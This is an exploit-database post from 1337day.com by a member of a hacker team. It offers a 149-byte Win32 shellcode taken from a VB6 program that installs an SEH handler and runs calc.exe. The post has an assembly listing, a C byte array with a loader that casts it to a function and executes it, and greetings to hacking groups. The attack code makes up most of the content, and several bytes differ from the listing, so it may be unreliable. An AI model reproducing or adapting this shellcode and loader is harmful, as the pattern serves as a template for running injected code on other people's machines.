1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # =========[ Sh31LC0d3.C ]=====> /* ### # Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes # Author : KedAns-Dz # E-mail : ked-h@hotmail.com | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Win32 # Target : VB6 ExE Project >*> Command : Shell ("calc.exe") # Tested on : Windows XP SP3 France ### */ // TesT Project >> Compile As Name k3d4n5.exe << /* 004018E0 > 55 | PUSH EBP 004018E1 . 8BEC | MOV EBP,ESP 004018E3 . 83EC 0C | SUB ESP,0C 004018E6 . 68 96104000 | PUSH ; SE handler installation (SEH) 004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0] 004018F1 . 50 | PUSH EAX 004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP 004018F9 . 83EC 30 | SUB ESP,30 004018FC . 53 | PUSH EBX 004018FD . 56 | PUSH ESI 004018FE . 57 | PUSH EDI 004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP 00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080 00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8] 0040190C . 8BC8 | MOV ECX,EAX 0040190E . 83E1 01 | AND ECX,1 00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX 00401914 . 24 FE | AND AL,0FE 00401916 . 50 | PUSH EAX 00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX 0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX] 0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4] 0040191F . 33F6 | XOR ESI,ESI 00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34] 00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI 00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24] 0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI 0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe 00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8 0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup 00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24] 00401944 . 6A 02 | PUSH 2 00401946 . 50 | PUSH EAX 00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell 0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24] 00401950 . DDD8 | FSTP ST 00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar 00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI 0040195B . 9B | WAIT 0040195C . 68 6E194000 | PUSH k3d4n5.0040196E 00401961 . EB 0A | JMP SHORT k3d4n5.0040196D 00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24] 00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar 0040196C . C3 | RETN */ char SEH[] = "\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64" "\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4" "\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24" "\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D" "\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08" "\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10" "\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42" "\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3"; int main(int argc, char **argv) { int (*shellcode)(); shellcode = (int (*)()) SEH; (int)(*shellcode)(); } /* #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... # Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org) # JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org) # www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ... #================================================================================================ */